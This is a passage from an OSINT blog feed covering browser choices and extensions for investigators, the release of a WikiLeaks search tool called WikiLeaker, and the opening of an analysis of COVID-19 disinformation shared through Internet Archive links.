https://substackcdn.com/image/fetch/$s_!E_US!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fb2d4775a-18b3-47db-bc2d-fa90111f5727_596x131.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h4>Vivaldi</h4><p>Vivaldi is based on Opera, or at least some of the key people overlap. I have just installed it but haven't used it. It seems to have promise and be comparable to Brave, but the jury is out. Other writeups comparing the two put them on near parity. One major drawback, in my opinion, is that Vivaldi lacks the inherent ad blocking capabilities and sends some telemetry data back to the mothership.</p><p>Other writeups:</p><p><strong><a href="https://www.slant.co/versus/5233/16094/~vivaldi_vs_brave" title="https://www.slant.co/versus/5233/16094/~vivaldi_vs_brave">Slant - Vivaldi vs Brave detailed comparison as of 2020</a></strong><a href="https://www.slant.co/versus/5233/16094/~vivaldi_vs_brave" title="https://www.slant.co/versus/5233/16094/~vivaldi_vs_brave"><br></a><em><a href="https://www.slant.co/versus/5233/16094/~vivaldi_vs_brave" title="https://www.slant.co/versus/5233/16094/~vivaldi_vs_brave">When comparing Vivaldi vs Brave, the Slant community recommends Vivaldi for most people. In the question "What are the&#8230;</a></em><a href="https://www.slant.co/versus/5233/16094/~vivaldi_vs_brave" title="https://www.slant.co/versus/5233/16094/~vivaldi_vs_brave">www.slant.co</a></p><p><strong><a href="https://techwiser.com/brave-vs-vivaldi/" title="https://techwiser.com/brave-vs-vivaldi/">Brave vs. Vivaldi: Which Browser Is Better and Why | TechWiser</a></strong><a href="https://techwiser.com/brave-vs-vivaldi/" title="https://techwiser.com/brave-vs-vivaldi/"><br></a><em><a href="https://techwiser.com/brave-vs-vivaldi/" title="https://techwiser.com/brave-vs-vivaldi/">Brave is a blockchain-based browser that claims to be faster than others. They block all ads by default and have an&#8230;</a></em><a href="https://techwiser.com/brave-vs-vivaldi/" title="https://techwiser.com/brave-vs-vivaldi/">techwiser.com</a></p><h4>IE/Edge</h4><p>One of my favorite cynical jokes is &#8220;What is the best part of Internet Exporer?&#8221; <strong>Using it to download Firefox or Chrome. </strong>All jokes aside, Edge allegedly improves what Internet Explorer was. Being entirely honest, I don&#8217;t use Windows enough to speak one way or another. During investigations, there are good reasons for using Edge, for the user agent string and in cases where the IE/Edge site is different than the others, or restricted only to Edge. The caveat and rebuttal to that is that there are user-agent string changing tools, plugins, and extensions to bypass this though. Moreso on the negative side, there are few protections from trackers, ads, and cookies.</p><h4>Safari</h4><p>Safari is only available on Apple products. It was deprecated in Windows about 4&#8211;5 years ago, so it is a niche browser. It has a lot of the same qualities as Edge in terms of user-agent strings in addition to sharing the same frustrations with trackers, ads, and cookies.</p><h3>Plugins and Extensions</h3><p>I am not going to rehash the best plugins for OSINT and OPSEC as <a href="https://medium.com/u/4832f2e34ff0">Null Byte</a> has already <a href="https://medium.com/@NullByteWht/top-10-browser-extensions-for-hackers-osint-researchers-fca19b469158">adequately covered the topic</a>. I will speak to the plugins and extensions that I do use on Chrome, Firefox, and Brave.</p><h4>Chrome and Brave</h4><p>I use the following:</p><ul><li><p>Password Manager (Purposefully Vague)</p></li><li><p><a href="https://chrome.google.com/webstore/detail/google-translate/aapbdbdomjkkjkaonfhkkikfgjllcleb">Google Translate</a></p></li><li><p><a href="https://chrome.google.com/webstore/detail/grammarly-for-chrome/kbfnbcaeplbcioakkpcpgfkobkghlhen">Grammar.ly</a></p></li><li><p><a href="https://chrome.google.com/webstore/detail/hunchly-20/amfnegileeghgikpggcebehdepknalbf">Hunchly</a></p></li><li><p><a href="https://privacybadger.org/">Privacy Badger</a></p></li><li><p><a href="https://github.com/gorhill/uBlock#installation">uBlock Origin</a></p></li><li><p><a href="https://chrome.google.com/webstore/detail/go-back-in-time/hgdahcpipmgehmaaankiglanlgljlakj">Go Back in Time (Archive.org)</a></p></li><li><p><a href="https://chrome.google.com/webstore/detail/exif-viewer-pro/mmbhfeiddhndihdjeganjggkmjapkffm">EXIF viewer Pro</a></p></li><li><p><a href="https://builtwith.com/">Builtwith</a></p></li><li><p><a href="https://chrome.google.com/webstore/detail/one-click-video-downloade/bhepgcoaibmmehlmckhlmbdgcemhidcg">One-Click Video Downloader</a></p></li><li><p><a href="https://chrome.google.com/webstore/detail/json-viewer-awesome/iemadiahhbebdklepanmkjenfdebfpfe">JSON Viewer Awesome</a></p></li><li><p><a href="https://www.fbpurity.com/">FB Purity</a></p></li></ul><h4>Firefox</h4><ul><li><p>Password Manager (Purposefully Vague)</p></li><li><p><a href="https://github.com/itsecurityco/to-google-translate">To Google Translate</a></p></li><li><p><a href="https://adblockplus.org/">AdBlock Plus</a></p></li><li><p><a href="https://privacybadger.org/">Privacy Badger</a></p></li><li><p><a href="https://github.com/gorhill/uBlock#installation">uBlock Origin</a></p></li><li><p><a href="https://github.com/mozilla/contain-facebook">Facebook Container</a></p></li><li><p><a href="http://araskin.webs.com/exif/exif.html">EXIF viewer</a></p></li><li><p><a href="https://github.com/JSONovich/jsonovich">JSONovich</a></p></li><li><p><a href="https://mybrowseraddon.com/useragent-switcher.html">User-Agent Switcher</a></p></li><li><p><a href="https://builtwith.com/">BuiltWith</a></p></li></ul><h3>Conclusion</h3><p>In conclusion, there are no absolutes. In OSINT and OPSEC, we must take steps to blend in. This survey of browsers is intended as a starting point for research and implementation based on your appetite for risk. Using one browser or another should not augment other sound advice including the use of VPNs, Encryption, Patch Management, Sock Accounts, and other tools and techniques. Your mileage may vary and as always, I am available for discussion if you have questions or concerns.</p>]]></content:encoded></item><item><title><![CDATA[Introducing WikiLeaker — An OSINT Tool for Searching WikiLeaks]]></title><description><![CDATA[I have been teaching virtual and in-person OSINT courses for about the last 6 months as The OSINTion. When going through the tools, I have&#8230;]]></description><link>https://tidbit.theosintion.com/p/introducing-wikileaker-an-osint-tool-for-searching-wikileaks-92f77c6e895d</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/introducing-wikileaker-an-osint-tool-for-searching-wikileaks-92f77c6e895d</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Wed, 15 Apr 2020 15:01:00 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!_7SK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_7SK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_7SK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png 424w, https://substackcdn.com/image/fetch/$s_!_7SK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png 848w, https://substackcdn.com/image/fetch/$s_!_7SK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png 1272w, https://substackcdn.com/image/fetch/$s_!_7SK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_7SK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_7SK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png 424w, https://substackcdn.com/image/fetch/$s_!_7SK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png 848w, https://substackcdn.com/image/fetch/$s_!_7SK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png 1272w, https://substackcdn.com/image/fetch/$s_!_7SK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3ee5266f-711b-4b13-9bbd-62c26fae136c_800x264.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!nTo8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!nTo8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png 424w, https://substackcdn.com/image/fetch/$s_!nTo8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png 848w, https://substackcdn.com/image/fetch/$s_!nTo8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png 1272w, https://substackcdn.com/image/fetch/$s_!nTo8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!nTo8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/f001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!nTo8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png 424w, https://substackcdn.com/image/fetch/$s_!nTo8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png 848w, https://substackcdn.com/image/fetch/$s_!nTo8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png 1272w, https://substackcdn.com/image/fetch/$s_!nTo8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ff001c1a0-2bf7-4339-aa35-97df68e7a857_544x110.png 1456w" sizes="100vw"></picture><div></div></div></a><figcaption class="image-caption">WikiLeaker</figcaption></figure></div><p>I have been teaching virtual and in-person OSINT courses for about the last 6 months as <a href="https://theosintion.com/">The OSINTion</a>. When going through the tools, I have always gone out of my way to provide credit where it is due to the tool developers and researchers behind the tools. One tool in particular that stuck out to me is Datasploit. The tool is written by <a href="https://twitter.com/upgoingstar">Shubham Mittal</a> and his team at RedHunt Labs. I have been an adherent of the tool since I learned that OSINT was, well&#8230;OSINT (h/t to <a href="https://medium.com/u/c3735240e0fa">Justin Seitz</a> for that). I am also a huge fan of <a href="https://twitter.com/LaNMaSteR53">Tim Tomes</a>&#8217; <a href="https://github.com/lanmaster53/recon-ng">Recon-ng</a>.</p><p>Why am I giving this back story?</p><p>Well, as many of you know, I am trying to improve my Python skills. I am working on a disinformation and deception tool, tentatively called DECEPTICON, as well as some other cool tools. All of this is part of my hobby-time Infosec and not part of my day job.</p><p>After having a bad training session &#8212; nothing went right. I set out to write some new scripts and provide my own datasets to students instead of relying on outside entities &#8212; I know, I should've been doing that already. Anyways, I wrote a parser for some data types in some quasi-authentic files. Take my <a href="https://attendee.gototraining.com/rt/6129189491602938369">NEW and IMPROVED REGEX course</a> (next classes are 4/25 and 5/2 &#8212; use WOSEC15, SAFEESCAPE15 or TRACELABS15 for 15% off) for access to the tool. :-)</p><p>After I finished that (and learned a thing or two, thanks to <a href="https://twitter.com/dreadjak">Kelso</a>), I got to thinking about ways to help give back to the Infosec/Hacker and OSINT communities. I decided that I would write a tool with similar functionality to the module of Datasploit, but I would write it in Python3 and follow <a href="https://twitter.com/WebBreacher">Micah Hoffman</a>&#8217;s approach to creating a tool and a Recon-ng module that is near identical.</p><p>Back to the tooling, the reason I continue to teach about Datasploit despite some of the features not working is that aside from Spiderfoot, to date, Datasploit is the only OSINT tool (to my knowledge) that queries WikiLeaks. Perhaps, I could write a tool and module that replicate the functionality of the Datasploit module. I did a few manual queries on WikiLeaks and then took a look at the code of Datasploit and confirmed that the URLs were the same.</p><p>Where I am putting my own twist to the code is my use of Pandas to handle the various data points that I am collecting. It may be because of the research I am doing with Data Science, but I find Pandas to make referencing data as well as importing/exporting structured data to be simple.</p><p>So, here we are. This is the release of WikiLeaker. Here is the <a href="https://github.com/jocephus/WikiLeaker">GitHub repo</a>. Installation instructions are on the README page of the repo. Simplying execute the script and pass a domain as an argument and anything containing that domain on WikiLeaks will populate to your screen.</p><p>I also included the Recon-ng module in the GitHub repo. The difference in Recon-ng is that you get all the functionality above, but it also writes the output to the Contacts database, as it parses email addresses using XPaths instead of re and pandas. It is available in the Recon-ng Marketplace.</p><p>In conclusion, seek forth and conquer. Use this tool to your heart&#8217;s content, but be safe (Safety Third) and do not do anything illegal/stupid.</p>]]></content:encoded></item><item><title><![CDATA[The Internet Archive Is Being Used As A Disinformation Mule]]></title><description><![CDATA[Actors are using archive.org and exploiting the &#8216;Save Page Now&#8217; feature to propagate disinformation even after their stories are removed.]]></description><link>https://tidbit.theosintion.com/p/the-internet-archive-is-being-used-as-a-disinformation-mule-fc90a6d07ced</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/the-internet-archive-is-being-used-as-a-disinformation-mule-fc90a6d07ced</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Wed, 15 Apr 2020 10:01:00 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!FGbC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FGbC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FGbC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png 424w, https://substackcdn.com/image/fetch/$s_!FGbC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png 848w, https://substackcdn.com/image/fetch/$s_!FGbC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png 1272w, https://substackcdn.com/image/fetch/$s_!FGbC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FGbC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FGbC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png 424w, https://substackcdn.com/image/fetch/$s_!FGbC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png 848w, https://substackcdn.com/image/fetch/$s_!FGbC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png 1272w, https://substackcdn.com/image/fetch/$s_!FGbC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F9c7e90f4-7617-4f32-9170-23235d3c40c2_300x300.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>As the world continues to battle the COVID-19 pandemic, some outlets are sharing samples of malware, while others are trumpeting politically biased information from both sides of the proverbial aisle, frequently perpetuating biased information as solid truth. This biased information could be disinformation, depending on the motive and subjectively, the severity<em>. </em>Alternatively, accidental omissions or inclusions of inaccuracies without ill-intent is<em> misinformation. </em>For this text, we will refer to biased media reporting from mostly-mainstream sources as <em>politically biased information. </em>I am focusing on<em> disinformation.</em></p><p>The primary difference between the two is that disinformation is more deliberate, with motives seeking to cause more harm, hate, distrust, and doubt. In contrast, biased reporting presents an opinion or point of view as fact. Politically biased reporting can cross the line of disinformation, but this article has a specific focus outside that of mainstream and/or reputable media sources.</p><p>As we know, some nation-states and threat actors will <em>&#8220;Never let a good crisis go to waste,&#8221; </em>and this pandemic is no different. <a href="https://twitter.com/malwrhunterteam">MalwareHunterTeam</a> has shared a few instances of <a href="https://twitter.com/malwrhunterteam/status/1249963221383098374">COVID-19 related malware</a>.</p><p>While I am interested in malware, I do not possess all the technical expertise and tools to analyze them. From the same lens, I do spend a lot of time on the internet, more specifically, social media. I am connected to/friends with a lot of people outside the technology industry that are not as savvy for hoaxes and disinformation. I try to watch what they post and share and identify trends relative to disinformation and true <em>Fake News</em>, not just things that contradict what any specific elected official, politician, or party disagrees with and dubs as <em>Fake News.</em></p><p>When COVID first gained the attention of the masses and stay at home orders were proposed, I said to myself, &#8220;There are going to be two things that come from this: Ambulance Chasers and Threat Actors.&#8221; I am surprised at the direction that this went.</p><p>Within the last week or so, I have observed an influx of stories shared from people that link to one of my favorite internet resources, especially from the lens of Open Source Intelligence (OSINT), and that is The Internet Archive (<a href="https://archive.org/">archive.org</a>.) From <a href="https://en.wikipedia.org/wiki/Internet_Archive">Wikipedia</a>, &#8216;The Internet Archive is an American digital library with the stated mission of &#8220;universal access to all knowledge.&#8221;&#8217;</p><p>I have observed links to direct disinformation campaigns being shared on social media with links to the Internet Archive. At first, I scoffed it off then began to see a pattern. Below is the analysis.</p><h3>Sample 1</h3><p>Starting with the first sample I saw, let&#8217;s take a look. Here is the link being shared:</p><p><strong><a href="http://web.archive.org/web/20200405061401/https://medium.com/@agaiziunas/covid-19-had-us-all-fooled-but-now-we-might-have-finally-found-its-secret-91182386efcb" title="http://web.archive.org/web/20200405061401/https://medium.com/@agaiziunas/covid-19-had-us-all-fooled-but-now-we-might-have-finally-found-its-secret-91182386efcb">Covid-19 had us all fooled, but now we might have finally found its secret.</a></strong><a href="http://web.archive.org/web/20200405061401/https://medium.com/@agaiziunas/covid-19-had-us-all-fooled-but-now-we-might-have-finally-found-its-secret-91182386efcb" title="http://web.archive.org/web/20200405061401/https://medium.com/@agaiziunas/covid-19-had-us-all-fooled-but-now-we-might-have-finally-found-its-secret-91182386efcb"><br></a><em><a href="http://web.archive.org/web/20200405061401/https://medium.com/@agaiziunas/covid-19-had-us-all-fooled-but-now-we-might-have-finally-found-its-secret-91182386efcb" title="http://web.archive.org/web/20200405061401/https://medium.com/@agaiziunas/covid-19-had-us-all-fooled-but-now-we-might-have-finally-found-its-secret-91182386efcb">In the last 3&#8211;5 days, a mountain of anecdotal evidence has come out of NYC, Italy, Spain, etc. about COVID-19 and&#8230;</a></em><a href="http://web.archive.org/web/20200405061401/https://medium.com/@agaiziunas/covid-19-had-us-all-fooled-but-now-we-might-have-finally-found-its-secret-91182386efcb" title="http://web.archive.org/web/20200405061401/https://medium.com/@agaiziunas/covid-19-had-us-all-fooled-but-now-we-might-have-finally-found-its-secret-91182386efcb">web.archive.org</a>.</p><p>Here is what we see by clicking the link:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Kdur!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Kdur!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png 424w, https://substackcdn.com/image/fetch/$s_!Kdur!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png 848w, https://substackcdn.com/image/fetch/$s_!Kdur!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png 1272w, https://substackcdn.com/image/fetch/$s_!Kdur!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Kdur!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/fe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Kdur!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png 424w, https://substackcdn.com/image/fetch/$s_!Kdur!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe879cb4-ef10-41af-aedf-a9441385f1d5_800x602.png 848w, 